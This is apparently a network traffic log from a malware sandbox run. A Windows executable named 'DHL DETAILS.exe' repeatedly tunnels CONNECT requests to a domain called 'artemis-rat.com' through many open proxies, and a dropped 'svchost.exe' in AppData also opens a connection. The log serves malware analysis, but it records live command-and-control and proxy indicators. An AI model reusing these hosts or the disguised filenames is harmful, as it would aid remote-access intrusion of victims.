Mar 9, 2024 13:14:14.561888933 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
528	192.168.2.5	51120	162.241.158.204	44607	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.408250093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.567503929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.601697922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:26.764123917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.880619049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
529	192.168.2.5	50957	39.109.113.97	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.417656898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.536381960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.785263062 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.16.1 Date: Sat, 09 Mar 2024 11:53:06 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
530	192.168.2.5	51022	163.172.137.49	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.423707962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.567503929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.601701021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
531	192.168.2.5	51628	157.185.157.151	26589	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.428774118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
532	192.168.2.5	51592	156.67.217.159	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.463356018 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.794440031 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
533	192.168.2.5	51683	104.25.194.175	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.463356972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.617844105 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
534	192.168.2.5	51610	51.15.210.79	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.463361025 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.098715067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.067614079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.825897932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.364722013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
535	192.168.2.5	51189	67.205.162.103	14398	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.463421106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.536462069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.724061012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:26.723809004 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.849556923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
536	192.168.2.5	51676	142.4.123.41	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.468281984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
537	192.168.2.5	51131	177.93.45.156	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.468920946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.643136978 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
538	192.168.2.5	51606	195.248.243.149	7237	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.475205898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.145567894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.130429029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.021194935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.833406925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
539	192.168.2.5	51631	98.162.25.29	31679	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.482700109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
540	192.168.2.5	51667	162.243.102.207	9764	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.483212948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
541	192.168.2.5	51551	117.160.250.133	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.487720966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.676846981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.354566097 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
542	192.168.2.5	51648	174.64.199.82	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.496972084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
543	192.168.2.5	51114	46.101.186.238	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.497926950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.536472082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.724081993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.596018076 CET	806	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:20 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 614 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
544	192.168.2.5	51649	72.195.114.169	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.500948906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
545	192.168.2.5	51651	174.77.111.196	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.501164913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
546	192.168.2.5	51650	98.162.25.4	31654	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.501554012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
547	192.168.2.5	51274	162.144.36.208	38242	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.501600981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.536516905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.724078894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
548	192.168.2.5	51002	8.222.152.158	55555	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.503675938 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
549	192.168.2.5	51612	101.133.175.251	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.505242109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.208107948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.333468914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.333462000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
550	192.168.2.5	51652	43.163.192.3	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
